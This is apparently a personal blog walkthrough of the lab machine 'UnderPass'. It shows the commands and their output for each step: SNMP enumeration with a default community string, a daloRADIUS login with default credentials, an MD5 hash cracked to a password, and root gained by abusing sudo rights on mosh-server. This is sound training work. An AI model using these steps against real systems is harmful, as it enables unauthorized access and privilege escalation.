ryuki's blog

UnderPass

May 10, 20255 min read

Machine Card showing UnderPass as an easy Linux machine

Reconnaissance

PORT      STATE    SERVICE    VERSION
22/tcp    open     ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_  256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp    open     http       Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Running a TCP scan with nmap just finds two open ports. The HTTP server on port 80 displays the default page and fuzzing for directories and files does not return anything interesting.

Hint

Depending on the wordlist used for the fuzzing it might contain the needed word.

Since the enumeration did not provide any leads, I also run a UDP scan and this time nmap also finds port 161 (snmp).

PORT    STATE SERVICE
161/udp open  snmp

Initial Access

The Simple Network Management Protocol (SNMP) is used to collect information from (network) devices and comes in three different versions. The version version 1 and 2 secure the access by a so-called community string. A common misconfiguration is a missing string or using public - this tracked as CVE-1999-0517.

Trying the community string public with snmpwalk lets me query all the information from available from the host. It does include a possible username steve and a description for the host containing daloradius.

$ snmpwalk -v2c -c public 10.129.231.213
iso.3.6.1.2.1.1.1.0 = STRING: "Linux underpass 5.15.0-126-generic #136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (53980) 0:08:59.80
iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"
iso.3.6.1.2.1.1.6.0 = STRING: "Nevada, U.S.A. but not Vegas"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (1) 0:00:00.01
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (55188) 0:09:11.88
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E9 04 04 10 28 23 00 2B 00 00 
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.15.0-126-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro net.ifnames=0 biosdevname=0
"
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 214
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
iso.3.6.1.2.1.25.1.7.0 = No more variables left in this MIB View (It is past the end of the MIB tree)

daloradius is an advanced RADIUS application and browsing to /daloradius shows a 403 error. Based on the source code within the Github repository there are multiple logins. The login as regular user does not work, but the default credentials administrator:radius1 let me in as an operator at /daloradius/app/operators/login.php.

Login prompt for operators

Following the link Go to users list on the home page redirects me to a table containing just a single user called svcMosh. Based on the length of the string in the password column it’s likely a MD5 hash.

john takes a few seconds to crack the hash 412DD4759978ACFCC81DEAB01B382403 and print the password underwaterfriends. This lets me login as svcMosh via SSH and collect the first flag.

daloradius showing the list of user(s) including the password hash

Privilege Escalation

Apparently the current user can run the mosh-server, the server component of the mobile shell, as anyone including root.

$ sudo -l
Matching Defaults entries for svcMosh on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
 
User svcMosh may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/bin/mosh-server

Doing just that prints a connect string before detaching from the process and letting the server run in the background.

$ sudo /usr/bin/mosh-server 
 
 
MOSH CONNECT 60001 I+7tea6K/xSw5n+HFcITBQ
 
mosh-server (mosh 1.3.2) [build mosh 1.3.2]
Copyright 2012 Keith Winstein <mosh-devel@mit.edu>
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
 
[mosh-server detached, pid = 1539]

The usage section in the documentation shows how to provide this key to the client to be used instead of a password. Doing so on the target host drops me right into a shell as root.

$ MOSH_KEY='I+7tea6K/xSw5n+HFcITBQ' mosh-client 127.0.0.1 60001
 
root@underpass:~# id
uid=0(root) gid=0(root) groups=0(root)

Attack Path

flowchart TD

subgraph "Initial Access"
	A(Web) -->|Fuzzing| B(Find dolaradius app)
	C(SNMP) -->|Default community string| B
	B -->|Default Credentials| D(Operator Access)
	D -->|Crack Hash| E(Shell as svcMosh)
end

subgraph "Privilege Escalation"
	E -->|Sudo Privileges| F(Run mosh-server as root)
	F -->|Login with MOSH_KEY| G(Shell as root)
end

Footnotes

  1. Testing the infrastructure

Recent ...